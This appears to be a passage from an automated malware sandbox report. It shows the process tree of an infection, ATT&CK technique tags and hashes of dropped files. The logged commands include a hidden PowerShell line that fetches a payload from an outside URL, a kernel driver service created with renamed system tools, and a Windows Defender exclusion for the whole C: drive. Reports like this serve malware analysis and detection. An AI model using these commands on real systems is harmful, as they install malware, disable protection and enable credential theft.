- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      PID:1380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4936
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:3828
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2436
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\JoqtiazeF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2712
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4680
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3000
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
        9⤵
        
        PID:2320
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
        9⤵
        
        PID:4784
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
        9⤵
        
        PID:544
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1456
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        10⤵
        Executes dropped EXE
        
        PID:3820
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5036
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif start TrueSight
        10⤵
        Executes dropped EXE
        
        PID:2920
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3032
        
        C:\Users\Public\aken.pif
        
        C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4076
      - C:\Users\Public\Libraries\ezaitqoJ.pif
        
        C:\Users\Public\Libraries\ezaitqoJ.pif
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2720
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2124

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1836

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
PID:5480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:5576

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5628

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:5796

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:5884

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
PID:5988

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:6084

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:4808

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
1⤵
- Executes dropped EXE
PID:1656

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
PID:908

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
PID:2744

C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3480

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:5208

C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5424

C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
1⤵
- Executes dropped EXE
PID:4984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
1⤵
PID:2972

C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4552

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:2432

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:2984

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:64
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:5496
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 912 916 924 8192 920 896
  2⤵
  - Modifies data under HKEY_USERS
  PID:5688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

Filesize
2.1MB

MD5
40100e679192c2cebbed5c973302658f

SHA1
9ed5a89436ca28ac13c7af59997cd1cdbbf50ada

SHA256
f892dd3477521759ec061c3d595c50779af07cb8c35164a95d1bc4d8374b4f71

SHA512
70eee46cbffb5ac2b5a5b17c67b0e7b06daa493a0f65f4bfd033f9c3aa5d0b6c18c2c24b0d780034553c4c7c33367cccb32da90f713c0c725a87c7c893acd33b

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
1.3MB

MD5
0f4ccef0be8e63931807f74bd8033dcd

SHA1
a905dcb410a93f2617e32d0eac1185acdcb789e8

SHA256
fe0fd22144c6730677df0a9f3e6b992450c33690a512650c246ea8d8212cf48f

SHA512
9d8bf369b19f5a49d3579bb4291333e08764ec0f6d32e7c98a4a018cc8a35c184ef03e0de11b8ceac4bac86458fa54b80af672b5c859e00374098c29f952de52

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
1.3MB

MD5
8b7ac477c3b2cb8af990cb68aaa85588

SHA1
4d74c4cbbc5059771abc2ffe78efd32644b0b385

SHA256
85b1316b05401bfbfa991750c944ae82c7f8dc140100ec49a765604b457a9b77

SHA512
f23be63f0bb0a2aac4b9c8c98ddb28387637d942648affbbf6cd784edd6a907f9ec8eec6f7b3401bce54782e7b812cee71381f517bbb6222f45226bbeb598f29

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

Filesize
2.1MB

MD5
26fc437da517945a00758b9250ab4b58

SHA1
b64b9ef1ff98543754affc9af9acdf524acfb94b

SHA256
333200e4b2fae0db9a87e15ded2b620419a645912fe7a9395be8a036e0b0a5ef

SHA512
122c26544e0c78dfe55e8988978278a3fd7d11a25374dd73e9ffbcd0b7e7c179bcbc2e83767060415eadbde7dd298da149dfdf512aad72ce564b6aee286e09c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e33rzg1f.hbi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
988KB

MD5
def78c9fbba5b51a694c94bdd8b90b5c

SHA1
4c9878326b3964e6aeea86e16800d13a6da7da38

SHA256
27a56c231c128fe16361c024507fa1f085e388440233f55842f9a42b5576e71e

SHA512
9001f2ea1fa8200030078741573606e55f70a823476987481a66ff2c841ded80541b2a74d2eebc564443e3583d7cbae016009c76214970d0e4fe018da4d91e5f

Download Submit
C:\Users\Public\Joqtiaze.url

Filesize
104B

MD5
47165d87b37ffc4e56b4c4046cb49679

SHA1
0ef07e2369b77468229d2eb234c43ae99d796635

SHA256
6a9c4f46c37f72ee213db8e6c0a9b26d3412bef485ba8c778b330c21a6545b2b

SHA512
3c339cbd30099eda6f87fe2367de7794909c8fc44a0b16230ce1ac234af578dc6b1ef046744a8ed22abeaddb9f5ad1238daa4bc8e73b42215d18e2cc648abb26

Download Submit
C:\Users\Public\JoqtiazeF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\Joqtiaze

Filesize
1.6MB

MD5
b7c4b7e009c054c00b36b6ee40520d34

SHA1
88464ac4f61016a99e0fd0c0279c72153135fd65

SHA256
d33482905d517afb0e6df473a9e7f6a475665b896222d8db071352b30e520fcf

SHA512
96ed83af90fba3516092cd86fc5279c557a008bbd70aaac286b3685a85ce5d03fc1cb4b6f5de580a574597c496ad226b51c347fd6c69cd4522fd2096f6f0e76b

Download Submit
C:\Users\Public\Libraries\Joqtiaze.mp3

Filesize
52KB

MD5
f53fa44c7b591a2be105344790543369

SHA1
363068731e87bcee19ad5cb802e14f9248465d31

SHA256
bfc2ef3b404294fe2fa05a8b71c7f786b58519175b7202a69fe30f45e607ff1c

SHA512
55b7b7cda3729598f0ea47c5c67761c2a6b3dc72189c5324f334bdf19bef6ce83218c41659ba2bc4783daa8b35a4f1d4f93ef33f667f4880258cd835a10724d9

Download Submit
C:\Users\Public\Libraries\NEO.cmd

Filesize
55KB

MD5
3c755cf5a64b256c08f9bb552167975c

SHA1
8c81ca56b178ffd77b15f59c5332813416d976d7

SHA256
12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

SHA512
8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

Download Submit
C:\Users\Public\Libraries\ezaitqoJ.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\Upha.pif

Filesize
70KB

MD5
3fb5cf71f7e7eb49790cb0e663434d80

SHA1
b4979a9f970029889713d756c3f123643dde73da

SHA256
41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

SHA512
2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

Download Submit
C:\Users\Public\aken.pif

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\alpha.pif

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\df.cmd

Filesize
988KB

MD5
17e6e713ed88991dfadaa8f898f44f39

SHA1
ff4ae1fc81e3bf4c853f216aba29d6f1ee40aafe

SHA256
993cdeb22d286c12418aa42265112149f4499104fa61cee4f0f0fef2426ea69f

SHA512
a3db59c1ec2ec419791dca2140d2cae3c63c1080e133a43b43e5f47c673c1a255b12f71c8e62a9f47026a985f8b1727d18fcf064d70e4605d279a99d98672bf5

Download Submit
C:\Users\Public\ript.exe

Filesize
157KB

MD5
24590bf74bbbbfd7d7ac070f4e3c44fd

SHA1
cdfe517d07f18623778829aa98d6bbadd3f294cd

SHA256
ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

SHA512
ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

Download Submit
C:\Windows \SysWOW64\netutils.dll

Filesize
116KB

MD5
0f088756537e0d65627ed2ea392dcaae

SHA1
983eb3818223641c13464831a2baad9466c3750f

SHA256
abe2b86bc07d11050451906dc5c6955e16341912a1da191fc05b80c6e2f44ad6

SHA512
d7ec6126467fd2300f2562be48d302513a92cee328470bf0b25b67dcf646ba6c824cd6195ba056b543db9e2a445991fe31ebc2f89d9eff084907d6af1384720d

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
C:\Windows\SysWOW64\perfhost.exe

Filesize
1.1MB

MD5
381a61fa17f6681ab1e52f09422e8a42

SHA1
01451f6b46809066dc7fd92cec272f043c4e0513

SHA256
7e1760c6bcc92b7766ca5cd83b0048c0f94f310c3545dcfc7b07f3814bf8ca69

SHA512
64d98247f3a801d6e7fad68b6e71ccc6839caaff708a203555b04e1453bac69737ac0c541acac4593bda33e146fa2732c9c25588f10fe89920121a95b5a39bea

Download Submit
C:\Windows\System32\AgentService.exe

Filesize
1.7MB

MD5
018c10e19166169c8b5955bb0e266164

SHA1
369e95c15522f87c826c0eca61c1b8f1a0799031

SHA256
432bc2404bf9bcb0caf7e689e574064e58348f156c82cb4ad2b62ec7650e3d3e

SHA512
ba4b6e0cdcd6a3926429056e53c44fe04056c61604565ec6fd116ac0d690215f54dc53d350e67f8f603b027dc61b7e4382fd70502aed8138d46480ffbf0c1b15

Download Submit
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Filesize
1.2MB

MD5
c41fac05b49f6b4ba705f3d1d2e2e3a4

SHA1
c98d098850fa39c6bbfa882589514d63bff43768

SHA256
9457c4df2973cd206a5798b18210a5cbf9739595b61948d23ac100d9a2865a67

SHA512
eb4f6d572836cf3ee7c5890a11569cc8d2e9e557830301840c462f4c2325b049fbb5f187173babcdf5ba8a8505dd4dc420306b2c3cfc5e569891834d809a7e19

Download Submit
C:\Windows\System32\FXSSVC.exe

Filesize
1.2MB

MD5
0e921c60a26d0b9028b599c8ab997c83

SHA1
79ec82f37c003f6e4a5b289bdb615a5c8ffe748a

SHA256
0ce50986dcc72402a3bdc0735990a1a355b4b401000fda52c94b4d432a6a32ce

SHA512
a0bfbc43eb8f981b137df5213b61981cc3be30cce64be7513b54d22823f3f9b6dea05b1b71b22f183bdc67df27428b0389163b4be8a0d15569b01d4f46284328

Download Submit
C:\Windows\System32\Locator.exe

Filesize
1.1MB

MD5
20507029bf74f88ad4fa3c349436b9ae

SHA1
eb22c0ab43a8c603e0ecb467661b6541dde598e5

SHA256
ec885d45ca5edbe6e9eab767ba39765ac44e28c157fa0d11673c1baf23db84ff

SHA512
ec6901751c48e5926b358d34227dcdba15f489363b2a53848fd7faba1510cb5e8226efc42fc03c493a527d0c2d274f03ff82f8dc0c08cadb69e7d419b4be46e8

Download Submit
C:\Windows\System32\OpenSSH\ssh-agent.exe

Filesize
1.4MB

MD5
a8199d66fff4d8cabe9ce8fb65c6835a

SHA1
45642fd06dca57836a92e23c0eeb0d6b6d4dfdef

SHA256
f010e623f1cd034623d67019b18edeaa7e9087f94c17641d48fd14493bd64e04

SHA512
f015f3c46cd1438410abe4308b7fab9ad5192bb2a6c3ac70c7e08e37d453c24ea69d47cfe6fbecfa7ad6e2943648625a6dbe33a3204a7f320460fd07d6c9bbc0

Download Submit
C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

Filesize
1.2MB

MD5
2b3e78e6c18a5df469b85fd82cf6096e

SHA1
e2ef06350f778bd350354b28a890a4a5472fb12f

SHA256
4af906869bf31035a6ccee874aca01938db05fa008d7f73be24cbbaad42476d6

SHA512
f49fde48f27a79c87bdd1566ab27794a3f719aa6332cdc51e9d1aa10053ca373bb32c9e228b36265cabf60ae5478ec7b1ed6266970844a9d24e28f166dc68fc3

Download Submit
C:\Windows\System32\SearchIndexer.exe

Filesize
1.4MB

MD5
e44ee255a01c9cb33239e7a87741b3ec

SHA1
187a10df4c7dc70bbbf94a65f3ae0292909c5553

SHA256
a9642ae506344ab8762b0c84c2baed14cb758bab3af90ea6d9984ff71db4b6f0

SHA512
62b7c75a15fd894b893f12eb3c91d0d72d4c4e4d4a1914f6196ccd76085e48cd0af38f7e860c0c7f83ab10b176ec1f020e1d0664d042b704447c73ef164d1676

Download Submit
C:\Windows\System32\SensorDataService.exe

Filesize
1.8MB

MD5
705fe5fac7e5ede89bc5ef8212d53493

SHA1
751e4169b01aab4c9c33f17acf01432164125d66

SHA256
76bbef991b94358052c199d5ac0be5efffae9e3ae1ea2b3df026f7c0a0bd3778

SHA512
4b15ff89e69265ed36627833ad7ce81f930bb26dd01a5b7321d05531635394f15c56735b1678fe7ca5e66295543f7147ffaf8d833300891beaaa851bfb7098d8

Download Submit
C:\Windows\System32\Spectrum.exe

Filesize
1.4MB

MD5
08fa88d16705235b0fa8cd968df63986

SHA1
1ab895eef5e113e38246a6d49cc4f5ca6f1ed22f

SHA256
844d8b7c9362e499a84150964d5a0d562181a36991f73c181845c12ade0d35e9

SHA512
d593ef4f01cea619abf0482721bd5ab77c3e47c422b1188802c26cdae521a6cde8f8ed4f6b554a62856d49fa00fd5dfaf8ccc1cad4c509c61a84636e7b6b45d9

Download Submit
C:\Windows\System32\TieringEngineService.exe

Filesize
1.4MB

MD5
4068ffcd0b313219c4d6ca4f58b1023e

SHA1
77948cc233dbb8dacc9fb6fad668dbbaaa548492

SHA256
2aab9bc280d8197f8fc776cd489ad03b34bcece66c5aac80b071a60ab508cd4d

SHA512
826ed3e551720a80a334538b8c15e475dce234dc31258aea3812347da4d421157ff4cad9db2c777dd3c8a92ed3ad85bd98b157987331e1d4abe0bb9d0ac4c916

Download Submit
C:\Windows\System32\VSSVC.exe

Filesize
2.0MB

MD5
571604191334fa63f04c4145bf5ed183

SHA1
30e1136875d2efb45ecaae2db6a90df82e29bd75

SHA256
c5db53a9eaba481fd240b266e2b278f4f9a9388534659af65b7f828a2a2987c8

SHA512
e0161c889d53be94d8ffc12176d7726dc6865c0540b173d8bd3d00d8ba551af7ddbdc7b11595e5e4d3460f8a16209fd91171175f47b47631d6b0e8be2f2d8e6b

Download Submit
C:\Windows\System32\alg.exe

Filesize
1.2MB

MD5
665ed67cd282a5598e0bdecbae104c9c

SHA1
7374a835f836bf19a127e6e267ada84f341e9d3c

SHA256
12da1d627dc99a97fb489c92ad956934c94236774b2840e2748073a7a7f5e5bd

SHA512
295f9d63bc037cc6fc6a21f07fa5f0c9c4e2ca95bf8822cf74ee4f4c4aa6851f7275f5d1b772a512fd34d01d62c73f1a050d72318a4f1bae4d481ac27eb0bec1

Download Submit
C:\Windows\System32\msdtc.exe

Filesize
1.2MB

MD5
e7b9d0dca9daf631ebbe5202964691b4

SHA1
130e30d623e5b2cdbe7987492ec0db0ecf0c2d02

SHA256
0614072479bb0d4d41820021ff2188274a24779cb82a89000d83d0c68261fe3e

SHA512
6e443e08aa0cbd9c96bb3402d80c2389c3f9e135eec2da30b470d4c7ffa96d6e3dc3b74ea2456f8059896c944f3ff2a166edb7401902d7c511dbfa1978d6a67b

Download Submit
C:\Windows\System32\snmptrap.exe

Filesize
1.1MB

MD5
122f94026183493af4351d436d9fb756

SHA1
1d342a96bbfee353f97cff3372ed4464d2ef34d2

SHA256
0352f7e326f284f45aa13d58ae43307e1ab68d7481a6ee4d12e13cb9588d4e2a

SHA512
57b4343e3046d4a515f41fc44adc3deb0e4809925d2d4b72cc7ced1a96edd93ef104e7396d04d5d7700ac9844c92eea70a4cc6c75205ed787edb10345e7ef593

Download Submit
C:\Windows\System32\vds.exe

Filesize
1.3MB

MD5
fb887a00d02349fa46cae1a49c79f745

SHA1
872f384645bdf965b812f7f4d46d20806474e8dd

SHA256
c169bcfc2348254672a221f9a7b99d673155c86d37177ca5828aa0a63c79d0e3

SHA512
103559b05a57ada72947f6eac62d2bd9f776c15c84f9cb2895f5bbf0698608c539854ea7c60270732999683c1e3e82eacf2bb70503cdc75b782b8cced0cf38e6

Download Submit
C:\Windows\System32\wbem\WmiApSrv.exe

Filesize
1.3MB

MD5
b787a2f108cd46140172b613ab9194a4

SHA1
4726c590fb538b2479cb2c5e073b667aa111e6bd

SHA256
a836332b88df564d411520ec0e3a213f9ba452fd16bf1a9ab88fb5471cc94481

SHA512
f837878a22e291a09a7706dbd22b836dd6ec596492cbda54e90d279f2af39996d308978e5231798c238eb44df7626122a60fa2c321b04f09c15f35b9226f5303

